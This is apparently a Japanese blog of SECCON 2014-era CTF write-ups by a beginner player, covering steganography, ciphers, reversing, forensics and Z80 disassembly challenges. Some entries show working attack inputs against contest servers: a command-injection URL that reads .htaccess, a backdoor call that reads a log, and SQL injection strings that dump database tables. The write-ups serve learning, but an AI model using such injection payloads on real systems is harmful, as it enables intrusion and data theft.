http://entryform.pwn.seccon.jp/register.cgi?name=d&action=Send&mail=%27+|+cat+.htaccess+%23
Order allow,deny
Deny from all
Satisfy All
#AuthUserFile /var/www/.htpasswd
#AuthGroupFile /dev/null
#AuthName "entryform.pwn"
#AuthType Basic
#Require valid-user
#Order deny,allow

ここには大したものはありませんでした。同様にlogファイルを見ようとしたところ、残念ながらパーミッションで見えませんでした。気になるのは、SECRETにあるbackdoor123.phpです。この内容をみてみます。はあ？これはバックドアじゃないですか！これをこんな感じに使えばいいのかな？

http://entryform.pwn.seccon.jp/SECRETS/backdoor123.php?cmd=cat+..%2Flog

Webブラウザから実行すると。

**FLAG**
SECCON{Glory_will_shine_on_you.}
********
skipfish@example.com	Smith
skipfish@example.com	Smith
skipfish@example.com	Smith
：
：

flagが取れました。

Steganography 1 (Stegano) 100点

MrFusion.gpjbというファイルが添付されていました。なんとなく、GIF、PNG、JPEG、BMPの頭文字をとったような拡張子です。ファイルの中身をバイナリエディターでざっとみたところ、よく見かける画像系のヘッダがあちこちにあり、複数の画像データを結合したファイルのようです。一般的な画像系のファイルヘッダの先頭のバイトは以下のようになっています。

JPEG　 FF D8
PNG　　89 50 4E 47
GIF　　47 49 46 38
BMP　　42 51

このバイト列をバイナリエディタで検索してマークをつけ、そのアドレスをメモしました。

00000000 GIF
00001B1F PNG
000025FF JPG
00006808 BMP
002A983E GIF
002AA300 PNG
002AAAB9 JPG
002AEEBB BMP
00551EF1 GIF
00552860 PNG
00553212 JPG
005577C5 BMP
007FA7FB GIF
007FB2BE PNG
007FBEDC JPG
007FFF21 最後のデータ

添付ファイルからこのアドレスに沿ってデータを抜き出すプログラムをCで作成しました。いつものように超適当に作ったものですが、GitHubにコミットしておきました。 https://github.com/kanpapa/ctf/blob/master/ctffile.c このプログラムを実行して作成されたファイルout0.bin〜out14.binを以下のスクリプトでリネームしました。

#!/bin/sh
./a.out
mv out0.bin out0.gif
mv out1.bin out1.png
mv out2.bin out2.jpg
mv out3.bin out3.bmp
mv out4.bin out4.gif
mv out5.bin out5.png
mv out6.bin out6.jpg
mv out7.bin out7.bmp
mv out8.bin out8.gif
mv out9.bin out9.png
mv out10.bin out10.jpg
mv out11.bin out11.bmp
mv out12.bin out12.gif
mv out13.bin out13.png
mv out14.bin out14.jpg

これらの画像ファイルで表示される画像を重ね合わせてflagが取れました。

Last Challenge (Thank you for playing) Exercises 50点

最後のおまけ問題です。暗号表がありますので１文字づつ比較して復号しました。

今回が３回目のCTFですが、依然として600点〜700点をうろうろしています。途中トラックボールが故障したり、VMwareのdebianがハングアップしたりなどいろいろありました。また画像系のツールを準備していなかったのでQRコードなど手がつけられなかったのが残念です。他の参加者の皆様のWrite-Upを参考にして次回に備えたいと思います。運営の皆様もお疲れさまでした。

SECCON 2014 online CTF 予選のWrite-upをまとめました

Sun, 07 Dec 2014 00:00:00 +0000

前回CTF予選に初参加しましたが、面白かったので今回のCTF予選にも参加してみました。

解いた問題は以下の７つの100点問題です。合計で700点獲得できました。

Welcome to SECCON（Start）
Easy Cipher（Crypto）
Shuffle（Binary）
Reverse it（Binary）
Get the key.txt（Forensics）
Choose the number（Programming）
Get the key（Network）

200点問題にもチャレンジしてみましたが、こちらは途中で時間切れとなってしまいました。

今回もCTF初心者ならではの100点問題ばかりのWrite-upを書いてみました。

Welcome to SECCON（Start）

いつもの練習用の問題で、単純にFlagを入力するだけです。

Easy Cipher（Crypto）

問題には以下のような数字の羅列が書かれていました。

87 101 108 1100011 0157 6d 0145 040 116 0157 100000 0164 104 1100101 32 0123 69 .....

規則性がみられます。“1100011"などの7桁の数字は0と1しかありません。これは２進数でしょう。 “0145"とか"0157"の４桁の数字は、7を超える数字がありません。また頭に0がついていて、８進数の書き方に見えます。これは８進数と想定しました。 “6d” とかはこれは16進数ですね。これ以外の数字は10進数と想定しました。

このルールで数字を全部16進数に変換して、バイナリエディタに入力しました。

1010011 0105 0103 67 79 1001110 123 87 110011 110001 67 110000 1001101 32 55 06053
53 45 43 43 4f 4e 7b 57 33 31 43 30 4d 20 37 30
S E C C O N { W 3 1 C 0 M 7 0
100000 110111 0110 110011 32 53 51 0103 0103 060 0116 040 5a 0117 73 0101 7d
20 37 48 33 20 35 33 43 43 30 4e 20 5a 4f 49 41 7d
7 H 3 5 3 C C 0 N Z O I A }

最後のあたりにフラグがありました。

Shuffle（Binary）****

提供されたファイルをLinuxのfileコマンドで確認しました。

$ file shuffle
shuffle: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
$

86系の実行ファイルのようです。Linux上で実行するとランダムな文字列が出力されました。この文字の出力からでは何もわかりませんでしたので、まずはバイナリエディタでそれらしき文字列がないかを確認しましたが、フラグはありませんでした。

次に、IDAという逆アセンブラで実行ファイルを解析してみたところ、以下のような怪しい部分がみつかりました。

.text:0804854B mov eax, 53h
.text:08048550 mov [esp+24h], al
.text:08048554 mov eax, 45h
.text:08048559 mov [esp+25h], al
.text:0804855D mov eax, 43h
.text:08048562 mov [esp+26h], al
.text:08048566 mov eax, 43h
.text:0804856B mov [esp+27h], al
.text:0804856F mov eax, 4Fh
.text:08048574 mov [esp+28h], al
:（延々と続く）
.text:08048694 mov [esp+48h], al
.text:08048698 mov eax, 21h
.text:0804869D mov [esp+49h], al
.text:080486A1 mov eax, 7Dh
.text:080486A6 mov [esp+4Ah], al
.text:080486AA mov eax, 0
.text:080486AF mov [esp+4Bh], al

これは明らかに文字列を１文字ずつ扱うことで隠そうとしている節があります。

代入している数値をバイナリエディタに入力したところ、フラグがでてきました。

Reverse it（Binary）****

まずはfileコマンドで確認

$ file Reverseit
Reverseit: data

単なるデータのようです。

次にバイナリエディターでダンプしたところ、“02"という数字が多く並んでいるのが気になりました。

問題はReverse itですから、何かを反転させる必要がありそうです。ふと思いついたのですが、“02"の上位と下位の桁を入れ替えると"20"になります。“20"はご存知の通り空白の文字コードです。もしも空白ということであれば、その開始と終了のあたりのデータを同じように入れ替えると文字列が現れるはずです。

これを試したところ、XMLぽいコードがでてきましたが、逆向きに読めました。

これらの結果から各バイトの上位桁と下位桁を入れ替えたあとに、データの最後から最初に向けて並べ替えるプログラムをPythonでかきました。

https://github.com/kanpapa/ctf/blob/master/reverse_it.py

変換後のファイルをバイナリエディタで覗いたところ、JFIFという文字が見えました。

これはJPEGファイルではないかということで、念のためファイルコマンドでも確認しました。

$ file Reverse.jpg
Reverse.jpg: JPEG image data, JFIF standard 1.01

拡張子を.jpgに変換してビューワーでみたところ、こんな画像がでてきました。

ご丁寧に文字の画像も反転していますので、反転して読むことでフラグが取れました

Get the key.txt（Forensics）

まずはいつものようにfileコマンドです。

$ file forensic100
forensic100: Linux rev 1.0 ext2 filesystem data
$

Linuxのext2ファイルシステムのようです。

念のためdumpe2fsコマンドで確認したところ、間違いないようです。

$ dumpe2fs forensic100

ファイルシステムとしてマウントしてみます。

$ mkdir mnt3
$ mount forensic100 mnt3
$ cd mnt3
$ ls -l : :

マウントできましたが、数字のファイルがたくさんでてきました。

fileコマンドで確認するとgzipファイルでしたので、試しに１つ解凍してみると、フラグが書かれていました。

しかし、すべてのファイルにフラグが書かれているようです。これではどれが本物かわかりません。

fileコマンドの結果をよく見たところ、key.txtと書かれたものがありました。これが本物のフラグでした。

Choose the number（Programming）

指定されたサーバにアクセスすると以下のようなものでした。

$ nc number.quals.seccon.jp 31337
4, 7
The minimum number?
Timeout, bye.
$ nc number.quals.seccon.jp 31337
-9, 5
The maximum number? 5
8, -9, 7
The minimum number? -9
-5, -7, -8, -4
The minimum number? -8
6, 0, 0, 1, 4
The maximum number?
Wrong, bye.
$

この調子でずっと繰り返すようです。人力では最後まで辿りつけそうもありません。

自動的に回答するプログラムをPythonで作成しました。

https://github.com/kanpapa/ctf/blob/master/choose_the_number.py

試してみると100回めでフラグが取れました。

$ python choose_the_number.py
0recvstr: -4, -7
The minimum number?
line1: -4, -7
line2: The minimum number?
strlist: ['-4', ' -7']
numlist: [-4, -7]
numlist(sort): [-7, -4]
sendstr: -7
1
recvstr: 4, 0
The maximum number?
line1: 4, 0
line2: The maximum number?
strlist: ['4', ' 0']
：
：
3231051924, 3238681159, 3338114506, 3402677356, 3425438800, 3448293469, 3573163659, 3649031632, 3662187780, 3812908271, 3816985767, 3846435394, 3982641142, 4085727022, 4156598984, 4201589254, 4277411618]
sendstr: -4177468994
recvstr: Congratulations!
recvstr: The flag is SECCON{Programming is so fun!}

Get the key（Network）

pcapファイルが添付されていましたので、Wiresharkに読み込みました。

BASIC認証を挟んだWebアクセスの通信ログのようです。まずは、HTTPで扱ってるファイルを抽出しました。（Export Object->HTTP）

この結果２つのHTMLファイルがでてきました。１つはAuthorization Requiredのエラー画面。もう１つはkey.htmlというファイルがダウンロードできる画面です。

この画面が見えているということは、ログにID/PWが残っているはずです。

そこで、このダウンロード画面が流れている部分のAuthorization:ヘッダにBASIC認証のIDとPasswordがあるはずなので確認したところ、WiresharkでデコードされたIDとPWがありました。

実際のサイトに接続してこのID/PWを入力することで、key.htmlを入手しフラグが取れました。

時間内に回答できたのは以上の７問になります。

あと面白そうな問題として以下の200点問題に取り組みました。

Let’s disassemble（Binary）****

指定されたサーバにアクセスすると以下のようなものでした。

$ nc disassemble.quals.seccon.jp 23168
#1 : F9
?
Timeout, bye.
$

このコードを逆アセンブルしろということでしょうか。

どんな機械語がでてくるのか適当に何回も叩いてみました。

$ nc disassemble.quals.seccon.jp 23168
#1 : 83
?
Something wrong, bye.
$ nc disassemble.quals.seccon.jp 23168
#1 : 36 14
?
Something wrong, bye.
$ nc disassemble.quals.seccon.jp 23168
#1 : CC 7B 27
?
Something wrong, bye.
$ nc disassemble.quals.seccon.jp 23168
#1 : 82
?
Something wrong, bye.
$ nc disassemble.quals.seccon.jp 23168
#1 : 14
?
Something wrong, bye.
$ nc disassemble.quals.seccon.jp 23168
#1 : 2A 56 98
?
Something wrong, bye.
$

どこか見覚えのあるような機械語です。なんとなく8ビットCPUのように思えます。

そこでものは試しとZ80の機械語表を取り出して、ハンド逆アセンブルをしてみました。

$ nc disassemble.quals.seccon.jp 23168
#1 : 6D
? LD L,L
#2 : A3
? AND E
#3 : C1
? POP BC
#4 : 96
? SUB (HL)
#5 : 39
? ADD HL,SP
#6 : B4
? OR H
#7 : 17
? RLA
#8 : 6E
? LD L,(HL)
#9 : 71
? LD (HL),C
#10 : 6B
? LD L,E
#11 : DA 75 76
? JP C,
Timeout, bye.
$

最後の行は時間切れで入力できませんでしたが、どうやらZ80で良いようです。とはいえこれも自動入力しないとtimeoutで通信が切れてしまいます。

やむなく、Pythonで自動入力の逆アセンブラプログラムを作成しはじめました。この時点であと５時間です・・・。

最初は8080の命令の範囲だけの出題かなと思って試していましたが、Z80の拡張命令も出てきて大掛かりなものになってしまいました。

作りかけのプログラムは以下におきました。これは不完全なものですのでご注意ください。

https://github.com/kanpapa/ctf/blob/master/lets_disassemble.py

途中まで実行を試した結果は以下のようになりました。いいところまでできたのですが。残念です。

$ python lets_disassemble.py
z80asm_len: 256
z80_ddasm_len: 256
z80_ddcbasm_len: 256
z80_fdcbasm_len: 256
0recvstr: #1 : A0
?
line1: #1 : A0
line2: ?
strlist: ['#1', ':', 'A0']
code_len: 1
code1: A0
code1_num: 160
code1_op: AND B
asm_code: AND B
sendstr: AND B
1
recvstr: #2 : F1
?
line1: #2 : F1
line2: ?
strlist: ['#2', ':', 'F1']
code_len: 1
code1: F1
code1_num: 241
code1_op: POP AF
asm_code: POP AF
sendstr: POP AF
:
:
66
recvstr: #67 : 48
?
line1: #67 : 48
line2: ?
strlist: ['#67', ':', '48']
code_len: 1
code1: 48
code1_num: 72
code1_op: LD C,B
asm_code: LD C,B
sendstr: LD C,B
67
recvstr: #68 : FD CB 9C D6
?
line1: #68 : FD CB 9C D6
line2: ?
strlist: ['#68', ':', 'FD', 'CB', '9C', 'D6']
code_len: 4
code4_num: 214
code4_op: SET 2,(IY+d)
asm_code: SET 2,(IY+9CH)
sendstr: SET 2,(IY+9CH)
68
recvstr: Something wrong, bye.
$

うーん。ちゃんと早朝から取り組めば間に合ったかもです。

でも、ここまでやって200点とはやはりチームでやらないと厳しいですね。

【追記】せっかくここまでやったので、プログラムを仕上げました。

dの値がマイナスがあることを忘れていて悩んでしまいました。修正点はGithubをご覧ください。

最終結果は以下の通りでフラグも取れました。

$ python lets_disassemble.py
z80asm_len: 256
z80_ddasm_len: 256
z80_ddcbasm_len: 256
z80_fdcbasm_len: 256
0recvstr: #1 : B0
?
line1: #1 : B0
line2: ?
strlist: ['#1', ':', 'B0']
code_len: 1
code1: B0
code1_num: 176
code1_op: OR B
asm_code: OR B
sendstr: OR B
1
recvstr: #2 : FA 74 2E
?
line1: #2 : FA 74 2E
line2: ?
strlist: ['#2', ':', 'FA', '74', '2E']
code_len: 3
code1: FA
:
:
code2_op: BIT 7,E
asm_code: BIT 7,E
sendstr: BIT 7,E
99
recvstr: #100 : CB 2F
?
line1: #100 : CB 2F
line2: ?
strlist: ['#100', ':', 'CB', '2F']
code_len: 2
code2_num: 47
code2_op: SRA A
asm_code: SRA A
sendstr: SRA A
recvstr: Congratulations!
recvstr: The flag is SECCON{I love Z80. How about you?}
recvstr:
recvstr:
recvstr:
recvstr:
$

まとめ

今回はプログラムを作らないと解決できないところがあり初めてPythonを使ってみました。見るにたえないプログラムだと思いますが、こんなプログラムでも参考になればということでGithubに入れておきました。

SECCON 2014 CTFに初めて参加しました

Mon, 21 Jul 2014 00:00:00 +0000

先日、CTF for Beginnersに参加しましたので、初めてCTF予選にも参加してみました。

解いた問題は以下の６つです。合計で600点獲得できました。

練習問題（100点）
このパケットを解析せよ（100点）
decode me（100点）
箱庭SQLiチャレンジ（100点）
重ねてみよう（100点）
879,394bytes（100点）

CTF初心者ですが、Write-upを書いてみました。

練習問題

練習用の問題で、単純にFlagを入力するだけです。

このパケットを解析せよ

seccon2014.pcapngをWiresharkに読み込んだところ、FTPの通信ログのようです。flag.txtというファイルをGETしていましたので、このファイルのデータを読んだところこんな内容が。

RkxBR3tGN1AgMTUgTjA3IDUzQ1VSM30=

BASE64ぽいのでデコードしたらFlagがでてきました。

decode me

encoded.txtの内容をバイナリエディタでみたところ、

FRPPBA 2014
ebg13/47

という文字列が。

FRPPBA 2014はSECCON 2014なのかなと推測し、並べてみたところ規則性が。

FRPPBA 2014→SECCON 2014
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm

これってROT13という暗号方式らしいです。でもバイナリをみる限りどうも2バイト文字も含まれているようで、それを扱うにはROT47というものがあるらしいです。

これも ebg13/47 → rot13/47 と一致しますし。

これを扱えるツールはnkfらしいので、Windows版のnkfをインストールして、表示してみたら・・・

>nkf -r encoded.txt
SECCON 2014 に参加のみなさまこんにちは。 rot13/47 に気付くとは流石です。 ｎｋｆコマンドで簡単にデコードできることにも気付きましたか？ というわけで、おめでとうございます！ フラグは半角英数文字に変換してから入力してください。 ＦＬＡＧ｛Ｈａｖｅ　ｆｕｎ　ＳＥＣＣＯＮ２０１４｝

これでFlagがとれました。

箱庭SQLiチャレンジ

手始めに以下を入力

' OR 1=1--
ID=0 NAME=Tanaka AGE=54 ADDRESS=Tokyo SALARY=90000.0 ID=1 NAME=Paul AGE=32 ADDRESS=California SALARY=20000.0 ID=2 NAME=Allen AGE=25 ADDRESS=Texas SALARY=15000.0 ID=3 NAME=Teddy AGE=23 ADDRESS=Norway SALARY=20000.0 ID=4 NAME=Mark AGE=25 ADDRESS=Rich-Mond SALARY=65000.0

おやおや。丸見えです。でも、Flagはここではなさそうです。

他のテーブルをみてみたいので次のように入力。

' OR 1=1 ; SELECT sql FROM sqlite_master; --
ID=0 NAME=Tanaka AGE=54 ADDRESS=Tokyo SALARY=90000.0 ID=1 NAME=Paul AGE=32 ADDRESS=California SALARY=20000.0 ID=2 NAME=Allen AGE=25 ADDRESS=Texas SALARY=15000.0 ID=3 NAME=Teddy AGE=23 ADDRESS=Norway SALARY=20000.0 ID=4 NAME=Mark AGE=25 ADDRESS=Rich-Mond SALARY=65000.0 sql=CREATE TABLE COMPANY(ID INT PRIMARY KEY NOT NULL, NAME TEXT NOT NULL,AGE INT NOT NULL, ADDRESS CHAR(50), SALARY REAL ) sql=NULL sql=CREATE TABLE SECCON(FLAG TEXT NOT NULL)

SQLコマンドの履歴が見えました。CREATE TABLEでテーブル名やスキーマがわかりました。SECCONというテーブルがあるようです。しかも、FLAG というTEXTがあります。これですね。

' OR 1=1 ; SELECT * FROM SECCON; --
ID=0 NAME=Tanaka AGE=54 ADDRESS=Tokyo SALARY=90000.0 ID=1 NAME=Paul AGE=32 ADDRESS=California SALARY=20000.0 ID=2 NAME=Allen AGE=25 ADDRESS=Texas SALARY=15000.0 ID=3 NAME=Teddy AGE=23 ADDRESS=Norway SALARY=20000.0 ID=4 NAME=Mark AGE=25 ADDRESS=Rich-Mond SALARY=65000.0 FLAG=FLAG{EnjoySQLi}

これでFlagがとれました。

重ねてみよう

afterimage.gifというアニメーションGIFのファイルが提供されました。白い点がランダムに表示されるものです。

問題の通り各コマを重ねると何か見えるのでしょう。

とりあえずアニメーションGIFを作成するようなツールを探してみたところ、Giamというツールがありましたので、これでafterimage.gifを読み込みました。次にツールで重ねて表示してみたところ、

QRコードらしきものが現れました。画像を白黒反転をしてiPhoneのQRコードで読み取るとFlagがとれました。

879,394bytes

Filesystem001.binというファイルシステムのデータのようです。

ファイルサイズが 879,394bytesのファイル名を答えろとのことなので、とりあえず879,394をHEXにしたところ、D6B22になります。これがファイルサイズとしてどこかにあるはずです。

たぶんFAT32だと思うので、バイナリエディタで開いてファイル名らしきものをキーにFATの構造に照らし合わせてファイルサイズが先ほどのHEX値と同じものを見つけました。でもロングファイル名のようです。次にVFATの構造と照らし合わせて、ロングファイル名を求めました。それがFlagでした。

まとめ

以上、今回は初めての参加で、100点の問題ばかりで終わってしまいましたが、参加されたかたのwrite-upを参考にしてテクニックを身につけたいと思います。

でもFlagがとれたときは気持ちいいですね。次回もぜひ参加してみたいと思います。